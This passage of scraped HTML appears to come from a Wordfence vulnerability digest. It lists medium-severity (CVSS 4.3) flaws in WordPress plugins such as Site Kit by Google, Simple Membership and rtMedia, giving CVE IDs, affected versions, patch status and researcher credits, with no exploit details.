<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/krypt3d" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/08c56aeab3dde56e4b6b7bbd8a05592b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="08c56aeab3dde56e4b6b7bbd8a05592b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/krypt3d" target="_blank" rel="noopener">Krypt3d</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0dd23096-d27f-4a50-a720-ef84d1fd7070" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/479f0c7e-f80b-4782-9467-541a83161d40" target="_blank" rel="noopener">Product XML Feed Manager for WooCommerce – Google Shopping, Social Sites, Skroutz &amp; More &lt; 3.1.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87919" target="_blank" rel="noopener noreferrer">							CVE-2026-87919						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-xml-feeds-for-woocommerce" target="_blank" rel="noopener">Product XML Feed Manager for WooCommerce – Google Shopping, Social Sites, Skroutz &amp; More</a> <span class="wfvr-software-slug">[product-xml-feeds-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/479f0c7e-f80b-4782-9467-541a83161d40" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75036037-514a-462e-a6a5-4913d70c3335" target="_blank" rel="noopener">Quads Ads Manager for Google AdSense  3.0.4 &#8211; Authenticated (Subscriber+) Payment Bypass to Unpaid Ad Placement Acquisition</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89050" target="_blank" rel="noopener noreferrer">							CVE-2026-89050						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quick-adsense-reloaded" target="_blank" rel="noopener">Quads Ads Manager for Google AdSense</a> <span class="wfvr-software-slug">[quick-adsense-reloaded]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75036037-514a-462e-a6a5-4913d70c3335" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd528d9e-15e9-4a3f-a782-0c616dc73708" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress &lt; 4.7.12 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88912" target="_blank" rel="noopener noreferrer">							CVE-2026-88912						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">rtMedia for WordPress, BuddyPress and bbPress</a> <span class="wfvr-software-slug">[buddypress-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd528d9e-15e9-4a3f-a782-0c616dc73708" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb72e0c-b188-41a0-bdd4-d2532d54903c" target="_blank" rel="noopener">RTMKit &lt;= 2.1.5 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62133" target="_blank" rel="noopener noreferrer">							CVE-2026-62133						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rometheme-for-elementor" target="_blank" rel="noopener">RTMKit</a> <span class="wfvr-software-slug">[rometheme-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/myungyong-lee" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/12033157b67df90c715a01b49cea314d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="12033157b67df90c715a01b49cea314d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/myungyong-lee" target="_blank" rel="noopener">MYUNGYONG LEE</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb72e0c-b188-41a0-bdd4-d2532d54903c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfb0bab-20d0-4172-b912-7f209cad4c3b" target="_blank" rel="noopener">Simple Membership &lt; 4.7.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88764" target="_blank" rel="noopener noreferrer">							CVE-2026-88764						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-membership" target="_blank" rel="noopener">Simple Membership</a> <span class="wfvr-software-slug">[simple-membership]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfb0bab-20d0-4172-b912-7f209cad4c3b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8493822-9b78-49c9-a4fb-93c22ebc0216" target="_blank" rel="noopener">Site Kit by Google – Analytics, Search Console, AdSense, Speed &lt;= 1.186.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62139" target="_blank" rel="noopener noreferrer">							CVE-2026-62139						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/google-site-kit" target="_blank" rel="noopener">Site Kit by Google – Analytics, Search Console, AdSense, Speed</a> <span class="wfvr-software-slug">[google-site-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8493822-9b78-49c9-a4fb-93c22ebc0216" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1675d695-96e1-4fbe-ae42-42a4668f36e0" target="_blank" rel="noopener">Slim SEO – AI SEO Plugin, Lightweight, Fast &amp; Automated &lt;= 4.10.0 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62113" target="_blank" rel="noopener noreferrer">							CVE-2026-62113						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slim-seo" target="_blank" rel="noopener">Slim SEO – AI SEO Plugin, Lightweight, Fast &amp; Automated</a> <span class="wfvr-software-slug">[slim-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sybre-waaijer" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sybre-waaijer" target="_blank" rel="noopener">Sybre Waaijer</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1675d695-96e1-4fbe-ae42-42a4668f36e0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d0a1a39-6421-4af1-9636-33604abd4861" target="_blank" rel="noopener">Sprout Invoices – Client Invoicing &amp; Estimates &lt; 20.8.16 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87797" target="_blank" rel="noopener noreferrer">							CVE-2026-87797						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sprout-invoices" target="_blank" rel="noopener">Sprout Invoices – Client Invoicing &amp; Estimates</a> <span class="wfvr-software-slug">[sprout-invoices]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4d0a1a39-6421-4af1-9636-33604abd4861" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cd4ad4d-7f2b-45ab-af31-848eb5763ae2" target="_blank" rel="noopener">SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects &lt; 4.7.40 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86781" target="_blank" rel="noopener noreferrer">							CVE-2026-86781						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ssl-zen" target="_blank" rel="noopener">SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects</a> <span class="wfvr-software-slug">[ssl-zen]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c2dae9339cb7a7417b7eedcaf09ddf9e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2dae9339cb7a7417b7eedcaf09ddf9e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener">Suhayb Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cd4ad4d-7f2b-45ab-af31-848eb5763ae2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0acd462-2f0b-4ced-8a1a-960f9527d47e" target="_blank" rel="noopener">Starter Templates: AI-Powered Website Templates for Elementor &amp; Gutenberg &lt;= 4.7.5 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62134" target="_blank" rel="noopener noreferrer">							CVE-2026-62134						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/astra-sites" target="_blank" rel="noopener">Starter Templates: AI-Powered Website Templates for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[astra-sites]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0acd462-2f0b-4ced-8a1a-960f9527d47e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a3313795-fe3b-4947-aa06-606934d435c3" target="_blank" rel="noopener">Temporary Login Without Password &lt; 1.9.9 &#8211; Authenticated (Custom Role+) Persistent Access After Login Revocation</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77753" target="_blank" rel="noopener noreferrer">							CVE-2026-77753						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/temporary-login-without-password" target="_blank" rel="noopener">Temporary Login Without Password</a> <span class="wfvr-software-slug">[temporary-login-without-password]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/baptoutatis" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b15dda37cd16c042771958e3983fb62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b15dda37cd16c042771958e3983fb62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/baptoutatis" target="_blank" rel="noopener">BaptouTatis</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a3313795-fe3b-4947-aa06-606934d435c3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cefb4f36-2131-466f-92f9-14c5bc38ad8e" target="_blank" rel="noopener">Ultimate Gift Cards for WooCommerce &lt;= 3.2.9 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75861" target="_blank" rel="noopener noreferrer">							CVE-2026-75861						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gift-cards-lite" target="_blank" rel="noopener">Ultimate Gift Cards for WooCommerce</a> <span class="wfvr-software-slug">[woo-gift-cards-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cefb4f36-2131-466f-92f9-14c5bc38ad8e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/faf822e2-20e7-4618-93ce-02de55b25d8b" target="_blank" rel="noopener">Unbounce Landing Pages &lt;= 1.1.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81781" target="_blank" rel="noopener noreferrer">							CVE-2026-81781						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unbounce" target="_blank" rel="noopener">Unbounce Landing Pages</a> <span class="wfvr-software-slug">[unbounce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1ff6f83f830b125bfe22fa490eb2bfe7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ff6f83f830b125bfe22fa490eb2bfe7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener">HieuPenguinnn</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/faf822e2-20e7-4618-93ce-02de55b25d8b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d211a77-82fe-4835-ac06-acec9e06864a" target="_blank" rel="noopener">Visualizer – Tables &amp; Charts Manager with Built-in AI Generator 4.0.0 &#8211; 4.0.5 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86782" target="_blank" rel="noopener noreferrer">							CVE-2026-86782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
